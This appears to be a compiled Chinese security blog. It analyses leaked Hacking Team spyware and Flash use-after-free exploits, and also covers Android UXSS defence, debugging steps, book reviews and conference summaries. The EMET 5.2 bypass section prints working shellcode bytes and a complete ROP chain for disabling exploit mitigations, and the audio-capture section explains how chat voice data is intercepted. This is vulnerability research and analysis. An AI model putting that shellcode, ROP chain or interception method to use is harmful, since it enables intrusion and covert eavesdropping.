Hacking Team 武器库研究(三):core-android-audiocapture

泄露的core-android-audiocapture一款Android平台下基于DBI Hook框架的语音窃取工具,可窃取当前国内外流行的即时聊天工具,比如wechat、whatsapp、skype等等。

##【源码分析】

1、搜索 mediaserver 进程,然后注入libt.so,并将窃取的语音文件dump到指定目录。

2、查看libt.c源码,其动态链接库的构造函数为my_init,这里参数和返回值都必须为空。

3、检测当前的Android系统是否为4.x版本,然后分不同的子版本进行处理。

4、比如对于Android 4.0版本,会指定mStramType和mname的偏移量,不同系统版本对应的偏移量不同,同时也定义一些将被hook的函数,这些Hook_coverage_x是定义在hijack_func/hooker.h中,对应的函数名在注释代码中已经写得很清楚,主要是Hook Android系统的audio接口提供库libaudiofinger.so里的函数,以用于实现录音(RecordThread)和放音(PlaybackThread)功能。


5、以Hook回调函数recordTrack_getNextBuffer3_h为例分析下它的修改行为,该函数定义在hijack_func/hooker_thumb.c中,原getNextBuffer获取的缓冲区主要是用于存放录音数据,而录音的开始、停止动作的相关函数也是被hook掉。在recordTrack_getNextBuffer3_h函数中先调用原始函数,得到返回后的结果,然后获取帧大小、采样率、帧数以及原始的AudioBufferProvider::Buffer地址。

6、创建指定格式的文件名,将语音数据dump出来写入到前面创建的文件:

7、录音Hook的日志记录如下,其它hook动作类似,此处就不一一分析。

8、生成的dump文件,会再调用decode.py去转换成wav语音文件

##【结语】

网上有人说这工具会去解密微信的语音格式,其实它根本没有做这方面的处理,也没必要,因为它Hook的Android系统的Audio库,当你使用一些即时聊天工具进行语音对话时,就会触发放音的函数,此时语音数据早就可以拿到,而decoder.py只是作一些wav的格式化处理,使得dump出来的文件能够转换成可播放的wav文件。在decoder目录下的一些聊天工具目录,只不过是Hacking Team成员在作一些测试而已。

Hacking Team 武器库研究(二):CVE-2015-5119 Flash 0day

目前 Hacking Team 泄露的Flash 0Day已经修复,官方已提供补丁下载,与此同时Metasploit已经提供有漏洞利用代码。在HT泄露的源码目录里,已经包含有对漏洞的简要分析。

【源码分析】

1、在MyClass.TryExp1函数中触发漏洞,先分配一组ByteArray,长度为0xfa0,相当于0x1000大小的内存。

2、设置ByteArray值,在将MyClass类赋值给_ba[3]时,AVM会调用MyClass.valueOf函数试图将MyClass类型其转换成Byte类型。

3、在valueOf 函数中会重新设置更大长度的ByteArray,导致释放原有的ByteArray内存,再重新分配,但是valueOf函数返回后,依然保持着对已释放内存的引用,从而导致UAF漏洞的发生。紧接着分配一堆0x3f0大小的vector.对象,以占用已释放的内存,然后返回0x40值给ba[3],刚好覆盖vector对象头部的长度值,以实现读写任意内存地址。

4、后面的代码基本跟第一篇分析文章中介绍一样。再补充下上面调用valueOf转换类型的AVM伪代码:

1
2
3
4
5
void ByteArray.setObjInternal(int offset, obj)
{
byte* dest = this.getStorage(offset);
dest* = toInteger(obj); // call MyClass.valueOf()
}

将ba[3]的内存存储地址保存到本地定义的目标指针,然后对象类型转换成整数类型并赋值给目标指针,当ByteArray数组长度改变时,它会释放原有ba内存,目标指针就成为悬挂指针。

Hacking Team 武器库研究(一):CVE-2015-0349 Flash ConvolutionFilter UAF

CVE-2015-0349 Flash ConvolutionFilter UAF 是今年Pwn2Own大赛上被用于攻破64位Flash的漏洞,在泄露的Hacking Team武器库中就包括了该漏洞的利用代码,以及利用本地提权漏洞作为shellcode,以绕过沙盒的保护。泄露的利用代码包含完整的工程文件,用Flash Develop打开项目即可编译。

【源码分析】

1、MyClass.TryExp1是漏洞利用的入口函数,它先创建ConvolutionFilter类,它是一个矩阵环绕滤镜,比如用于实现模糊、斜边、锐化等效果。它的2个参数分别为matrixX矩阵列数和matrixY矩阵行数,这里分别是14和15。

2、接下来程序将分配ConvolutionFilter的a(Array类型)赋值给_cf (ConvolutionFilter对象),并设置matrix值为m(Array类型),接着将matrix数组的第一个元素赋值给m0,当它不为0是则表示漏洞不存在,否则即存在UAF漏洞。为何如此?在第一点中,我们知道m[0]是MyClass类,该类里面定义有valueOf方法,在设置martix值时会调用到该方法,具体见第3点分析。

3、在valueOf 函数中,matrixX会被重新设置为15(原始值为14),导致原先有matrix数组被释放,然后重新分配矩阵滤镜的matrixX内存,但此时_cf.matrix依然保持着对已释放的matrix数组的引用,所以在第2点会会去判断matrix数组首个元素值是否为0(原初始值也是0),也就是判断已释放的数组是否还可被引用。

4、通过分配一堆Vector.对象去占用已释放的内存,长度刚好与matrix数组长度相同,也就是matrixX matrixY = 1415,每个vector.对象的实际大小就是14154=0x348(840),最后在从valueOf函数中返回2,2会被写入matrix数组首个元素中,但此时实际是向Vector对象写入数据,从而更改vector对象长度,实现任意内存读写。

5、再回头继续看MyClass.TryExp1函数,找到已经被篡改长度值的vector对象,再根据不同的系统平台执行不同的shellcode代码。

6、看下32位windows平台的shellcode执行相关的ShellWin32类,先看初始化函数init,它只是做一些全局变量赋值。

7、真正用于执行代码的是ShellWin32.Exec函数,先获取包含shellcode的_x32对象地址,然后在内存中搜索PE头,解析PE文件格式,从导入表中找到VirtualProtect函数地址,调用它对shellcode内存地址设置可执行权限,接着找到自定义的payload空函数对应的JIT函数指针,用shellcode地址去替换JIT指针,最后调用payload.call 以执行shellcode的。

绕过最新版 EMET 5.2 保护摘要

绕过EMET 5.2 EAT保护:

【保护原理】

分别对ntdll、kernel32和kernelbase的EAT基址下断点,断点地址记录在调试寄存器dr0、dr1、dr2、dr3上,dr6保存最新调试异常的状态信息,dr7包含4个断点的设置,当利用漏洞去调用EAT时就会触发中断。

开启EAT保护前:

1
2
3
4
5
0:000> rM 20
dr0=00000000 dr1=00000000 dr2=00000000
dr3=00000000 dr6=00000000 dr7=00000000
ntdll!LdrpDoDebuggerBreak+0x2c:
76f3103b cc int 3

开启EAT保护后:

1
2
3
4
5
0:000> rM 20
dr0=76ea0204 dr1=7645ff8c dr2=7628b85c
dr3=00000000 dr6=ffff0ff2 dr7=0fff0115
ntdll!LdrpSnapThunk+0x1c1:
76ec01ae 03c2 add eax,edx

【绕过方法】

通过构造异常触发,来构造寄存器上下文,防止后面因dr寄存器清空也触发异常。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
mov     eax, 150h     ; 指向服务号,防止异常处理失效
xor ecx, ecx
sub esp, 2cch ; makes space for CONTEXT
mov dword ptr [esp], 10010h ; CONTEXT_DEBUG_REGISTERS
mov dword ptr [esp + 4], ecx ; context.Dr0 = 0
mov dword ptr [esp + 8], ecx ; context.Dr1 = 0
mov dword ptr [esp + 0ch], ecx ; context.Dr2 = 0
mov dword ptr [esp + 10h], ecx ; context.Dr3 = 0
mov dword ptr [esp + 14h], ecx ; context.Dr6 = 0
mov dword ptr [esp + 18h], ecx ; context.Dr7 = 0
push esp
push 0fffffffeh ; current thread
mov edx, esp
call dword ptr fs : [0C0h] ; this also decrements ESP by 4
add esp, 4 + 2cch + 8

disable_EAF = (
"\xB8\x50\x01\x00\x00" + # mov eax,150h
"\x33\xC9" + # xor ecx,ecx
"\x81\xEC\xCC\x02\x00\x00" + # sub esp,2CCh ,makes space for CONTEXT
"\xC7\x04\x24\x10\x00\x01\x00" + # mov dword ptr [esp],10010h
"\x89\x4C\x24\x04" + # mov dword ptr [esp+4],ecx
"\x89\x4C\x24\x08" + # mov dword ptr [esp+8],ecx
"\x89\x4C\x24\x0C" + # mov dword ptr [esp+0Ch],ecx
"\x89\x4C\x24\x10" + # mov dword ptr [esp+10h],ecx
"\x89\x4C\x24\x14" + # mov dword ptr [esp+14h],ecx
"\x89\x4C\x24\x18" + # mov dword ptr [esp+18h],ecx
"\x54" + # push esp
"\x6A\xFE" + # push 0FFFFFFFEh
"\x8B\xD4" + # mov edx,esp
"\x64\xFF\x15\xC0\x00\x00\x00" + # call dword ptr fs:[0C0h]
"\x81\xC4\xD8\x02\x00\x00" # add esp,2D8h
)

绕过EMET 5.2 MemProt保护:

【保护原理】

EMET对VirtualProtect和VirtuaProtectEx进行Hook,正常情况下,执行上述函数后调用ntdll!ZwProtectVirtualMemory,接着向eax=0x4d传递服务号,然后调用 call dword ptr fs:[0C0h],此时EDX传递5个参数(进程句柄、地址、大小、可读写执行权限、可写地址),然后继续执行下去。

【绕过方法】

旧版EMET如4.1上,可以用VirtualAlloc/VirtuAllocEx。

最新版EMET 5.2上,可以用后面执行的原始代码去代替被EMET HOOK的地方,即构造ROP,使得eax=0x4d,然后通过ntdll!NtQueryInformationThread中的call dword ptr fs:[0c0h]指令去执行。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
[
msvcr120 = 0x73c60000 # 固定基址,无ASLR保护模块msvcr

# Delta used to fix the addresses based on the new base address of msvcr120.dll.
md = msvcr120 - 0x70480000 # 0x37E0000

# EAX = ntdll!RtlExitUserThread
md + 0x7053b8fb, # POP EAX # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x7056507c, # IAT: &ntdll!RtlExitUserThread
md + 0x70501e19, # MOV EAX,DWORD PTR [EAX] # POP ESI # POP EBP # RETN ** [MSVCR120.dll] ** | asciiprint,ascii {PAGE_EXECUTE_READ}
0x11111111,
0x11111111,

# EAX = ntdll!NtQueryInformationThread
md + 0x7049178a, # ADD EAX,8 # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x7049178a, # ADD EAX,8 # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x7049178a, # ADD EAX,8 # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x704a691c, # ADD EAX,DWORD PTR [EAX] # RETN ** [MSVCR120.dll] ** | asciiprint,ascii {PAGE_EXECUTE_READ}
md + 0x704ecd87, # ADD EAX,4 # POP ESI # POP EBP # RETN 0x04 ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
0x11111111,
0x11111111,
md + 0x7048f607, # RETN (ROP NOP) [MSVCR120.dll]
0x11111111, # for RETN 0x04

# EAX -> "call dword ptr fs:[0C0h] # add esp,4 # ret 14h"
md + 0x7049178a, # ADD EAX,8 # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x704aa20f, # INC EAX # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x704aa20f, # INC EAX # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x704aa20f, # INC EAX # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}

# EBX -> "call dword ptr fs:[0C0h] # add esp,4 # ret 14h"
md + 0x704819e8, # XCHG EAX,EBX # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}

# ECX = 0; EAX = 0x4d
md + 0x704f2485, # XOR ECX,ECX # MOV EAX,ECX # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
md + 0x7053b8fb, # POP EAX # RETN ** [MSVCR120.dll] ** | {PAGE_EXECUTE_READ}
0x4d,

md + 0x704c0a08, # JMP EBX
md + 0x7055adf3, # JMP ESP
0x11111111, # for RETN 0x14
0x11111111, # for RETN 0x14
0x11111111, # for RETN 0x14
0x11111111, # for RETN 0x14
0x11111111, # for RETN 0x14

# real_code:
0x90901eeb, # jmp skip

# args:
0xffffffff, # current process handle
0x11111111, # &address = ptr to address
0x11111111, # &size = ptr to size
0x40,
md + 0x705658f2, # &Writable location [MSVCR120.dll]
# end_args:
0x11111111, # address code_size + 8 # size
# skip:
]

Android Webview UXSS 漏洞攻防


“前事之不忘,后事之师”—— 《战国策·赵策》

【开篇:前车之鉴】

随着移动互联网的发展,很多PC端的安全问题也在移动端逐步出现。比如,使用WebKit内核的Chrome浏览器此前就出现过各种通用型的XSS(即UXSS,见文末附注)【如图1】,现在Android上也出现同类漏洞。Google把WebKit移植到了Android上,并将其作为WebView组件封装在SDK中,但官方忘记了“前车之鉴”,导致曾经在WebKit出现过的漏洞,在Android系统上再一次重现,即使该漏洞在PC版Chrome上已修复过。



图1 :Chrome UXSS漏洞列表

目前,许多Android应用是直接使用系统自带的WebView,进而导致系统上安装的各类应用可能受到WebView漏洞的影响,这就进一步将漏洞影响范围扩大化,使得各种主流应用都受其影响,一场未见销烟的血雨腥风就此展开。

【中篇:血雨腥风】

从2011年开始,Google的chromium项目的Bug列表就陆续被报告webkit存在一些UXSS漏洞。比如CVE-2011-3881 WebKitHTMLObjectElement UXSS漏洞,其对应的PoC代码【如图2】:



图2:CVE-2011-3881 PoC代码

该漏洞主要由于HTMLPlugInImageElement::allowedToLoadFrameURL函数中对Javascript URL地址校验不足导致的跨域问题。查看下修复前后的代码对比【如图3】,可以发现修复代码对使用Javascript伪协议的URL增加了安全检测,只有当前域与内嵌ifame域的serucityOrigin安全信息(比如protocol、domain、host、port等等)在许可范围内才能互相访问,即浏览器的“同源策略“。



图3:补丁代码对比

补丁代码是调用securityOrigin::canAccess来检测是否同源,对应代码【如图4】。该函数主要执行以下操作:

1. 先判断两个securityOrigin信息是否相同,是否具备唯一性,相同时则返回真,不相同时又会根据是否设置document.domain进行不同的检测;
2. 当两者均未设置document.domain时,则检测URL中的scheme、host、port是否相同,相同则返回真;
3. 当均设置document.domain时,则检测URL的domain与scheme是否相同,相同则返回真;
4. 若是打开本地文件,则执行其它文件安全检查。



图4:SecurityOrigin::canAccess函数代码

其它很多UXSS漏洞也是对源检测不全导致的跨域问题,虽然在Chrome浏览器上修复了,但由于Android系统引用了同一套WebKit,导致曾被修复的漏洞再次重现。

2013年底,国内安全人员就开始陆续将这类Android UXSS爆光在网上,也有不少人到乌云平台上刷分。之后,各种主流IT资讯站点、漏洞平台、自媒体上纷纷可以见到Android上各种弹框框的场面,尤为火爆。

此前,腾讯安全中心终端安全团队也对Android UXSS漏洞进行过研究,发现此类UXSS漏洞危害还是比较大的,且影响到许多主流的Android应用,特别是涉及金融交易、个人通讯等敏感功能的应用,很容易导致资金被窃、帐号被盗或者隐私泄露。对此,TSRC的同学做了个演示demo,通过提供一个二维码或者url发送给他人,当使用聊天工具或者购物应用扫描二维码或者打开链接后,那么就可以窃取到他人的个人资料【如图5】。



图5:利用UXSS漏洞窃取用户资料

同时,TSRC的同学也开发出一款UXSS自动化检测工具【如图6】,既支持批量测试,也支持PC、Android浏览器的检测,也发现当前国内一些Android下的浏览器也受UXSS漏洞影响,个别PC端的浏览器也受到影响。



图6:浏览器UXSS自动化检测工具

Android UXSS主要是Android系统本身遗留的安全问题,但如果都各大应用厂商都依赖Google来修复的话,就显得过于被动了。而且即使Google修复了,多数用户也未必会及时升级。这样的话,许多用户依然可能会受到UXSS漏洞的影响。所以对于各应用厂商而言,动手去堆壁固垒筑造属于自己的城防是很有必要的。

【下篇:堆壁固垒】

在Android的WebViewClient对象中,提供有一个叫OnPageStarted的事件方法【如图7】,它是WebView注入代码最早的事件,因此我们可以在攻击者利用UXSS注入JS代码前执行我们自己的检测代码,判断是否存在跨域操作。



图7:OnPageStared事件方法

与此同时,还可通过对动态创建的危险元素进行 JS Hook,比如iframe、object等元素,然后再跟踪里面的的事件行为,看是否存在跨域,若存在就全部过滤掉,拒绝加载。

目前腾讯安全中心终端安全团队已经完成该防御方案的开发,其测试效果【如图8】,可在不破坏程序稳定性的情况下,防御Android上的UXSS漏洞。



图8:Android UXSS防御工具Demo

前面提到的这些UXSS漏洞,目前已经在最新版Android 4.4中修复,同时它也提供了自动升级webkit的功能,以便及时修复漏洞,因此建议广大用户尽量采用最新版的Android系统。

对于厂商,除采用OnPageStarted + JS Hook的方法,还可以打包最新的Webkit内核供自家产品调用,但这会大大增加应用包的体积,而且需要跟随Google Webkit官方进行更新,相对麻烦一些,各厂商可根据自身情况选定。

【后记:路漫漫其修远】

Android UXSS只是Android漏洞上的冰山一角,除此之外,还有addJavascriptInterface执行漏洞、FakeID漏洞等等,未来可能还会有其它漏洞被爆光,在面对这类安全问题时,如何更好地防御它,我们还有很多路要走。
有攻,必有防,如何在攻与防的对立统一中寻求突破,是一个安全人员永恒的话题。

【附注:何为UXSS】

通用型跨站脚本(UXSS,Universal Cross-Site Scfipting),主要是利用浏览器及插件的漏洞(比如同源策略绕过,导致A站的脚本可以访问B站的各种私有属性,例如cookie等)来构造跨站条件,以执行恶意代码。它与普通的XSS的不同点就在于漏洞对象及受害范围的差异上,如表1所示。



表1:UXSS与普通XSS的对比

正是由于UXSS可影响在浏览器访问的所有站点,因此才将其称为通用型跨站。

动态调试 Android so库函数的方法

  1. am start -D -n 包名/类名,以等待调试的模式启动APK应用;

  2. su权限开启android_server,然后adb forward tcp:23946 tcp:23946 转发端口,并用IDA附加相应进程;

  3. 通过DDMS获取相应进程的端口号,然后使用jdb -connect com.sun.jdi.SocketAttach:hostname=127.0.0.1,port=8700(DDMS查询到的端口号);

  4. 连接成功后,按F9后手机上的“waiting for debugger”提示会自动消失;

  5. 此时在so库的JNI_Onload函数上下断点,可通过Ctrl+S找到对应so库的基址,然后加上JNI_Onload的文件偏移量,即可找到JNI_Onload函数的内存地址,然后按F9运行后即可断下。

下图是使用上述方法,断在某so库JNI_Onload函数的截图:

购书心得




富家不用买良田,书中自有千钟粟;
安居不用架高堂,书中自有黄金屋;
出门莫恨无人随,书中车马多如簇;
娶妻莫恨无良媒,书中自有颜如玉;
男儿若遂平生志,六经勤向窗前读。

—— 宋真宗赵恒《劝学诗》

移动安全篇

国 内移动安全书籍很少,主要还是以国外的居多,虽然大部分未引进,但是很多可以在网上找到高清彩色英文原版,有些可能就是官方自己发出来的。虽然国外这方面 的书籍多,但看过几本Andorid安全书籍,感觉还是一般,深度不够,比如《Android Security:Attacks and Defenses》、《Android Apps Security》、《Mobile Application Security》、《Mobile Malware Attacks and Defense》,国内的《移动互联网之智能终端安全揭秘》也是不推荐,过多列点组装,缺乏个人主观理解,《Android安全机制解析与应用实践》更是 别买,学术派写的wiki式书籍。笔者推荐几本:《Android Security Cookbook》、《Android 软件安全与逆向分析》主要是讲Android应用安全,Android系统安全的书籍尚无专著出版,不过4月份《Android Hacker’s Handbook》就要出版了,看目录还是感觉蛮有料的,iOS安全书籍相对少一些,主要有《iOS Hacker’s Handbook》(主要讲系统安全,别买中文版,译者缺乏软件安全基础,错误太多,令人不忍直视)、《iOS应用安全攻防》(英文版,偏向应用安全)、 《iOS应用逆向工程:分析与实战》(今年刚出的iOS应用逆向方面的书籍),其它关于Android与iOS开发的书籍,网上电子版很多,自己挑着看 吧,移动安全方面的书籍,我大多是看电子书,买的纸质书基本都是不行。所以目前,移动安全书籍,还是尽量看国内英文原版吧,如果对Android安全感兴 趣的,看下《Android Hacker’s Handbook》一书(补充:目前网上已有电子版)。

程序设计篇

此处 程序语言主要以C、ASM为主,毕竟自己主要也只是学这两门语言,其它脚本语言,如PHP、ASP就不提了。关于C语言的书籍就有传说中的 “C语言四大名著”,即《C程序设计语言》、《C和指针》、《C陷阱与缺陷》、《C专家编程》,感觉在C编程上这几本书就够用了,至于数据结构和算法可参 考其它国外名著。国产的编程书籍没几本可出手的,关于C入门书籍,很多人会推荐谭浩强那书,最初我也是读这本书入门的,但后来慢慢地发觉那书不是很好,错 误不少,编程风格也不好。对于那些写着精通XXX、24小时XXX、30天XXX、XXX从入门到精通,这些书都是拿书名来忽悠人的,纯粹是作者用来骗稿 费的,对比一下那些国外名著的书名就知道了,一本好书一般是不会用那些土名字的。我很赞成SAI兄弟说的,半年之内不接触的技术,就不用去买这方面的书籍 了。关于ASM主要就《80x86汇编语言程序设计》、《windows环境下的32位汇编程序设 计》这两本,汇编语言的书籍相对会少一点,一些网上书店的程序设计一栏中甚至没有asm一类。很多编程书籍的内容写的都是千篇一律,比如C语言书籍, 不外乎都是些变量、数组、指针这些,但是某些书籍中就会有提到编程风格、内存优化、树、链表、折半搜索法,GDB调试,linux方面的知识,比如《c primer plus》《C和指针》,这些也算是书本的一个亮点。关于windows编程,首推《windows程序设计》上下册、《windows核心编程》,其它 的感觉也没必要看太多,还是以实践为主。编程书籍由于附有很多代码,在电脑上看电子版的感觉很伤眼,容易眼疲劳,因此有必要的话,可以买实体书来看,而且 在实际应用中,有时可以再拿出来参考参考,方便查阅。与此同时,也要奉劝大家“纸上得来终觉浅,绝知此事要躬行”,特别是对于编程学习者,一定要动手写代 码,光看书是没用,这也是我曾经犯过的错误!而且有些书是用来参考查阅,不是用来看的,不然即使你把那些牛书都看完 ,到最后也可能连几句代码也写不出来,最后受伤的永远是你自己!

逆向工程篇

关于逆向工程这方面的书籍,自然是首 推看雪出版的《加密与解密》,在这方面,看雪的实力不会比国外的差,那里是逆向学习交流的好场所。在加解密第3版出版的时候就曾出现过山寨版的,因此大家 在购买时得看清楚了,最好到正规的书店购买,目前可能网上买不到了,不过网上有电子版。另外这方面的书籍还有《黑客反汇编揭密》《黑客调试技术揭密》 《逆向工程揭密》,国内出版的《软件调试》也是本牛书,弥补了国内这方面的空缺。还有出版的《IDA权威指南》也是本不错的书籍,详细讲解了IDA的 方方面面,看了之后,你会发现,会用IDA与不会用的差别有多大了。看雪翻译小组也曾出版过一本《IDA Pro代码破解揭秘》,不过这书我也没看过。在逆向工程这方面的书籍也差不多就这么几本了,其它像加解密入门实战,加密与解密实战超级手册,加解密全攻 略……这些基本上都可以摒弃,基本都是抄看雪加解密一书上的东西,大家无须花金钱、时间和精力在此上面。关于获取最新书讯的方法,大家可以订阅互动出版网 计算机新书的RSS,只要有计算机新书出来立马就知道了,它上面经常更新,不过很也是应用技术书籍,对于这些书籍,很多是 没必要买的,比如什么 windows 7使用大全,精通注册表,windows操作XXX,有必要的话,直接百度、google就行了,没必要花钱去买这类书籍。

脚本安全篇

在 脚本攻防方面的书籍,最早的曾云好写的《精通黑客脚本》,这书写得相当全面,由浅入深,虽然不厚,但排版密集,内容还是很多的,只是纸质不太好,很 粗糙,里面有很多渗透实战案例,当年国内这方面的法律还不是很严格,若是放在今天,可能里面一些内容会被删除掉。另外大家也可看看老外的 《黑客攻防技术宝典:WEB实战篇》(重点推荐)《xss attack》《sql injection》(中译本:《SQL注入攻击与防御》),以及《WEB安全测试》,英文版的网上有电子书。近两年国内出版的,主要就《白帽子讲WEB 安全》、《WEB前端黑客技术》,推荐一阅。

系统底层篇

当年看的第一本系统原理书籍是《深入理解计算机系统》,很不错的一本书。其它此类书籍还有《深入解析windows操作系统》《widnows系统原理与 实现》等,国内之前还出了本 《windows操作系统原理》,上面还写着重点大学计算机教材,后面看了乱雪博客上一篇文章后才知道那书是抄袭的,还被原作者控告了,最后还赔偿 了,当年我还从头看完了。关于溢出攻击的书籍,国内主要有《网络渗透技术》、《0day安全:软件漏洞分析技术》《灰帽黑客》,虽然 网渗一书很早出版,其中有些已经过时,但是其思想是不会过时的。若想获取最新书籍,最好的方法还是上面说的:订阅RSS。对于一些不熟悉的技术书籍,一定 要先看完整目录,然后找找网上是否有电子版的,如果有就先看看再决定是否再买,另外如果你已经买或看过同类的经典书籍,就需要重新考虑是否真的有必要买 了。讲了那么多要花钱的书,下面讲讲免费的一套,那就《intel开发手册》,这一套是由因特尔公司免费向全球赠送的书籍,共五本,之前我还订了两套,全 都从美国寄到学校来了,原本以为第一封邮件没收到,就再发了一封,没想到Intel居然连送两套过来,真是大方的不行啊!现在他们已经不再寄送纸质书,仅 寄送包含电子版的光盘。’

关于CanSecWest 2013大会

文档下载:http://cansecwest.com/csw13archive.html

此次CanSecWest 2013大会的质量明显要高出BlackHat EU 2013很多,主要还是软件/系统安全为主,涉及漏洞利用和挖掘等技术。

1、《Fuzzing for logic and state issues》

Peach Fuzzer框架的作者写的,主要是介绍peach3的新增特性,增加逻辑漏洞和无效的状态转换等问题,比如一些WEB认证的逻辑漏洞,PPT写得比较简洁,纯文字描述,不好完整理解,建议还是上官网看peach3的使用文档吧:http://peachfuzzer.com/v3/PeachPit.html ,上个月作者刚更新的,写得比较详细。

2、《DEP ASLR bypass without ROP JIT》

绿盟的TK讲的,里面的思路最早是在2009年的中国软件安全峰会《Vulnerability: The next 10 years》中提到的,主要是利用 SharedUserData 地址 0x7ffe0000 在win上是固定不变的,再通过它找到SystemCall,然后设置其参数,来调用指定的系统函数。在安全峰会上,作者是调用NtUserLockWorkStation这一函数来设置锁屏,而在此次CSW大会上,作者是通过LdrHotPatchRoutine索引到LdrLoadDll来加载外部的DLL,实现任意代码执行,这种方法只工作在winx64上的32位程序,且在win8上微软已经修复此问题。

3、《Adobe Sandbox WHEN THE BROKER IS BROKEN》

exploit系列教程的作者peter写的议题,在以前的一些大会上,也有人做过关于adobe sandbox的分享,但总觉得PPT写得不过详细,这次peter的议题,我觉得写得挺详细的,由浅入深,从介绍沙盒的相关术语、client与broker之间的通讯原理开始讲起,并提起一些沙盒逃逸的攻击面,分析和提取cross call函数等信息,同时也提供一些demo,可惜只有ppt,要是能提供paper和code就更好了。

4、《An Android Hacker’s Journey- Challenges in Android Security Research》

对我而言,里面让我最感兴趣的是作者即将出版的《Android Hacker’s Handbook》这个系列的书都很经典,包括shellcode、web、macosx以及ios等书,都是相当经典的,上面4本除了ios那书只看了一小部分之外,其它3本我都详细阅读过,值得推荐,前两本国内早有中译本了。
这个议题里面讲了一些android软件漏洞,包括一些组件权限设置问题导致的信息泄露,以及linux内核漏洞,其中还有一张赛门铁克提供的移动设备威胁图表,列出了移动设备可能面临的各种安全威胁,做得挺不错的。最后讲述了一些android平台的调试技巧,包括远程调试、源码调试等,有兴趣的朋友可以看下。

5、《Assessing the Linux Desktop’s Security》

感觉一般,对这议题也不是很感兴趣。

6、《MS SQL Post Exploitation Shenanigans: You’re In, Now What?》

讲述 MS SQL Server 利用技术,主要是利用扩展存储过程API来利用MSSQL,包括获取密码hash,内存搜索hash替换,编写poc创建后门,以及利用msf来控制shell等方式。在实际的渗透测试中,相信大多数的企业还是会选择使用php + mysql,特别是近些年来,这一组合的比例一直在扩大,所以估计对此文感兴趣的人不会太多。

7、《Cracking and Analyzing Apple iCloud backups, Find My iPhone, Document Storage》

基本就是在讲苹果的icloud服务及其原理,跟安全相关的内容不多,爱看不看。

8、《UPnP Vulnerabilities》

PPT写得很是简单,内容也不是感兴趣,爱看不看。

9、《Analysis of a Windows Kernel Vulnerability》

共有273页,这是我见过最长的PPT文档。主要讲Duqu病毒所使用的 CVE-2011-3402:Windows win32k.sys TrueType 字体解析数组越界漏洞,从TTF字体格式开始分析,解释漏洞成因,以及漏洞的利用技术。在去年的syscan大会上,360的人也针对此漏洞分析过其原理及利用技术,可以交互参考阅读。国内最早分析并公开细节的应该是启明星辰,其在博客上也帖出了相应的分析文章,看雪和binvul论坛均有人发表相关的漏洞分析文章。

10、《iOS 6 Exploitation 280 Days Later》

作者之前搞了近10年的WEB安全,2010年中才开始搞iphone安全,但他98年就开始接触安全,也算是安全界的老一辈革命家了。讲了2012年之后出现过的一些ios漏洞,以及关于ios安全相关的资料和书籍,同时介绍苹果对此采取的一些保护机制(cookie、ASLR、程序目录权限限制……),大部分篇幅还是在介绍ios的保护机制。

11、《Evil Maid Just Got Angrier:Why Full-Disk Encryption With TPM is Insecure on Many Systems》

讲述关于bios那些底层的东东,看不懂,真心看不懂!

12、《Physical Privilege Escalation and Mitigation in the x86 World》

硬件hacking一类的议题,PPT也大多是贴图,不好理解,反正是没看懂这PPT

13、《Smart TV Security》

一个有趣的议题,主要讲关于智能电视安全,包括智能电视机上面的app漏洞,以及恶意app感染、网络通讯安全等问题,同时还介绍智能电视固件rootkit的开发,如何留取后门。控制智能电视后最大的风险就是用它来监控和窃听你的行为,因为智能电视都配有摄像头。最后,还介绍一些调试等逆向相关技术,以及操作电视的一些API函数。

14、《The Evolution of BlackHole》

总觉得这是BlackHol exploit kit的广告帖,介绍BlackHole这一漏洞利用工具包的一些功能,一套售价冒似是1500美元,不过里面的一些功能看起来还是不错的。

关于BlackHat EU 2013大会

大会文档下载:https://www.blackhat.com/eu-13/archives.html

此次BH EU 议题整体较水,涉及系统安全、移动安全、网络传输安全、WEB安全、游戏安全等。下面随便挑几个议题简单介绍下,有些议题不是很感兴趣,有些也特水,有兴趣的自己到上面链接下载文档。

1、《A PERFECT CRIME? ONLY TIME WILL TELL》

讲述SSL攻击方法——CRIME,如何从SSL加密的会话中获取到cookie,CRIME原理就是通过在受害者的浏览器中运行JavaScript代码并同时监听HTTPS传输数据,进而解密会话Cookie,也算是中间人攻击MIMT的一种方法。该议题对CRIME方法进行扩展,介绍一种叫TIME (Timing Info-leak MadeEasy)的攻击手法,基于传输时间来猜测payload size,然后逐字猜解cookie。

2、《ADVANCED HEAP MANIPULATION IN WINDOWS 8》

介绍常堆及内核溢出利用技巧,以及在win8上改进后的内存安全保护机制。里面构造堆内存布局的exploit技巧,与以往利用信息泄露获取dll基址来绕过ASLR方法有些类似,都通过分配特定大小的堆块,然后释放出与造成溢出的堆块大小相同的堆块,触发漏洞后覆盖到特定结构。同时,介绍了内核中的堆块分配与释放的原理,然后讲述不同大小的堆块溢出后,如何构造相应的堆布局来实现利用。最后,以windows object内核漏洞为例,讲述win7\win8上的exploit技巧,在wihte paper中已给出相应的exploit代码。

3、《THE DEPUTIES ARE STILL CONFUSED》

总之,这议题很水,爱看不看。主要讲CSRF和点击劫持clickjacking的攻击技巧,里面也提到前段时间facebook爆出的OAuth2认证漏洞,点击劫持就讲下beef的clickjacking模块,然后提下防御点击劫持的x-frame-options

4、《Hacking Appliances: Ironic exploits in security products》

初看这标题,还以为是讲客户端软件漏洞利用呢,其实主要还是讲WEB安全的多一些,觉得有点水。

5、《HACKING VIDEO CONFERENCING SYSTEMS》

